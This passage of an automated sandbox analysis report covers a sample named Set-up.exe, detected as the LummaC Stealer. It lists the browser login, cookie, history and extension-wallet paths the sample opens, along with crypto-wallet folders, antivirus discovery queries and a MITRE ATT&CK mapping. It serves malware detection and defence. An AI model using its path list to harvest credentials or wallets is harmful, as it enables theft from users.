              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\f5360217 VolumeInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeCode function: 36_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,36_2_00491486
              Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Set-up.exe, 00000000.00000003.2016247632.000000000095F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916494967.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016469638.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017129214.0000000000962000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7160, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Set-up.exeString found in binary or memory: %appdata%\Electrum-LTC\wallets
              Source: Set-up.exeString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Set-up.exeString found in binary or memory: Jaxx Liberty
              Source: Set-up.exeString found in binary or memory: window-state.json
              Source: Set-up.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Set-up.exeString found in binary or memory: ExodusWeb3
              Source: Set-up.exeString found in binary or memory: %appdata%\Ethereum
              Source: Set-up.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Set-up.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1889930772.0000000000961000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1886496911.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1863772475.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1874172879.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1874509187.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7160, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7160, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation              		1
              DLL Side-Loading              		11
              Process Injection              		1
              Masquerading              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		221
              Virtualization/Sandbox Evasion              		LSASS Memory521
              Security Software Discovery              		Remote Desktop Protocol41
              Data from Local System              		1
